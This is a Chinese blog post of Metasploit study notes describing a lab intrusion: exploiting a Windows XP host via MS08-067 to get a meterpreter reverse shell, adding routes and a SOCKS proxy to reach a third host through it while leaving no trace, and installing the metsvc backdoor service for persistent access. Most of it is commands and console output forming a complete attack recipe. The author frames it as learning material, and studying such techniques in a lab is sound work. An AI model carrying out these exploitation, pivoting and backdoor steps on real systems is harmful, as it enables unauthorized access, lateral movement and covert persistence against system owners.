突破meterpreter建立永久访问权限访问其他主机——借刀杀人

最新推荐文章于 2024-05-11 20:03:59 发布

我重来不说话

最新推荐文章于 2024-05-11 20:03:59 发布

阅读量1.6k

点赞数 3

分类专栏：精通Metasploit学习笔记文章标签： metasploit 渗透测试 kali linux 安全漏洞 windows xp

本文链接：https://blog.csdn.net/qq_19623861/article/details/116559699

版权

精通Metasploit学习笔记专栏收录该内容

41 篇文章 30 订阅

订阅专栏

文章目录

前言
一、使用场景
二、实施步骤
总结

前言

渗透目标主机，对目标主机搭建跳板建立代理服务器，通过代理主机访问其他主机，不留痕迹

一、使用场景

突破meterpreter

主机a想访问c无法访问，c只让特定的IP地址访问，例如b，此时就可以先渗透b，在上面搭建跳板建立代理服务器，通过代理服务器访问c

本期例子，a主机使用kali，b主机winxp，c主机linux

二、实施步骤

1.渗透b主机

因为目标位winxp，先使用最常用的MS08_067漏洞测试
打开数据库

┌──(root💀kali)-[~]
└─# service postgresql start

进入msf搜索ms08_067，使用并配置好参数

msf6 > search ms08_067

Matching Modules
================

   #  Name                                 Disclosure Date  Rank   Check  Description
   -  ----                                 ---------------  ----   -----  -----------
   0  exploit/windows/smb/ms08_067_netapi  2008-10-28       great  Yes    MS08-067 Microsoft Server Service Relative Path Stack Corruption


Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/smb/ms08_067_netapi

msf6 > use 0
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms08_067_netapi) > options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.113    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting


msf6 exploit(windows/smb/ms08_067_netapi) > set target 34
target => 34
msf6 exploit(windows/smb/ms08_067_netapi) > set rhosts 192.168.1.115
rhosts => 192.168.1.115

进行攻击

msf6 exploit(windows/smb/ms08_067_netapi) > run

[*] Started reverse TCP handler on 192.168.1.113:4444 
[*] 192.168.1.115:445 - Attempting to trigger the vulnerability...
[*] Sending stage (175174 bytes) to 192.168.1.115
[*] Meterpreter session 1 opened (192.168.1.113:4444 -> 192.168.1.115:1384) at 2021-05-09 09:20:58 +0800

meterpreter >

成功得到meterpreter权限，使用autoroute添加路由项，添加的地址是c主机地址

meterpreter > run autoroute -p

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] No routes have been added yet
meterpreter > run autoroute -s 192.168.1.106

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] Adding a route to 192.168.1.106/255.255.255.0...
[+] Added route to 192.168.1.106/255.255.255.0 via 192.168.1.115
[*] Use the -p option to list all active routes
meterpreter > run autoroute -p

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]

Active Routing Table
====================

   Subnet             Netmask            Gateway
   ------             -------            -------
   192.168.1.106      255.255.255.0      Session 1

meterpreter >

background返回

到这里我们已经获取了b主机的meterpreter权限，成功渗透并添加了路由项

2.建立socks代理服务器

使用socks模块，配置好参数直接run

msf6 exploit(windows/smb/ms08_067_netapi) > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > options

Module options (auxiliary/server/socks_proxy):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD                   no        Proxy password for SOCKS5 listener
   SRVHOST   0.0.0.0          yes       The address to listen on
   SRVPORT   1080             yes       The port to listen on
   USERNAME                   no        Proxy username for SOCKS5 listener
   VERSION   5                yes       The SOCKS version to use (Accepted: 4a, 5)


Auxiliary action:

   Name   Description
   ----   -----------
   Proxy  Run a SOCKS proxy server

msf6 auxiliary(server/socks_proxy) > set version 4a
version => 4a
msf6 auxiliary(server/socks_proxy) > set srvhost 127.0.0.1
srvhost => 127.0.0.1
msf6 auxiliary(server/socks_proxy) > run
[*] Auxiliary module running as background job 0.
msf6 auxiliary(server/socks_proxy) > 
[*] Starting the SOCKS proxy server

代理服务器端口已经打开，紧接着还要配置etc/proxychains.conf文件

┌──(root💀kali)-[/]
└─# cat etc/proxychains4.conf 
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks4  127.0.0.1 1080  #修改处

文件的socks4 要改成这样的，可以使用vim修改，上一篇有提到过vim基本操作

到这里命令行内已经配置完毕

3.设置浏览器代理

本人是用的是kali自带的firefox esr，设置代理

设置好代理后进行访问

我这里没有访问成功的原因应该是目标的www文件夹内没有文件，所以访问不到。

4.设置永久访问权限

对b主机的渗透很容易丢失，所以有必要进行权限持久化，这里通过安装metSVC

meterpreter > run metsvc -A

[!] Meterpreter scripts are deprecated. Try exploit/windows/local/persistence.
[!] Example: run exploit/windows/local/persistence OPTION=value [...]
[*] Creating a meterpreter service on port 31337
[*] Creating a temporary installation directory C:\WINDOWS\TEMP\MWPrEozxdnwJwU...
[*]  >> Uploading metsrv.x86.dll...
[*]  >> Uploading metsvc-server.exe...
[*]  >> Uploading metsvc.exe...
[*] Starting the service...
         * Installing service metsvc
 * Starting service
Service metsvc successfully installed.

[*] Trying to connect to the Meterpreter service at 192.168.1.115:31337...
meterpreter > [*] 192.168.1.115 - Meterpreter session 2 closed.  Reason: Died

meterpreter > [*] Meterpreter session 2 opened (192.168.1.115:1385 -> 192.168.1.115:31337) at 2021-05-09 09:36:10 +0800

可以看到，metSVC在端口31337上创建一个服务，然后上传一个恶意软件，今后，每当需要访问该服务，只需要使用handler，将payload设置成metsvc_bing_tcp，就可以再次访问

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload payload/windows/metsvc_bind_tcp
payload => windows/metsvc_bind_tcp
msf6 exploit(multi/handler) > options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/metsvc_bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LPORT     4444             yes       The listen port
   RHOST                      no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

msf6 exploit(multi/handler) > set lport 31337
lport => 31337
msf6 exploit(multi/handler) > set rhost 192.168.1.115
rhost => 192.168.1.115
msf6 exploit(multi/handler) > exploit
[*] Started bind TCP handler against 192.168.1.115:31337
[*] Meterpreter session 7 opened (192.168.1.115:1387 -> 192.168.1.115:31337) at 2021-05-09 09:45:09 +0800
meterpreter >

成功进入

总结

本文简单介绍了突破meterpreter脚本和建立永久访问权限，本人也在学习当中，仅供参考，作为学习笔记使用，欢迎一起讨论。

我重来不说话

关注

3
点赞
踩
10

收藏

觉得还不错? 一键收藏
打赏
1
评论
突破meterpreter建立永久访问权限访问其他主机——借刀杀人

文章目录前言一、使用场景二、实施步骤1.渗透b主机2.建立socks代理服务器3.设置浏览器代理4.设置永久访问权限总结前言渗透目标主机，对目标主机搭建跳板建立代理服务器，通过代理主机访问其他主机，不留痕迹一、使用场景主机a想访问c无法访问，c只让特定的IP地址访问，例如b，此时就可以先渗透b，在上面搭建跳板建立代理服务器，通过代理服务器访问c本期例子，a主机使用kali，b主机winxp，c主机linux二、实施步骤1.渗透b主机因为目标位winxp，先使用最常用的MS08_06
复制链接

扫一扫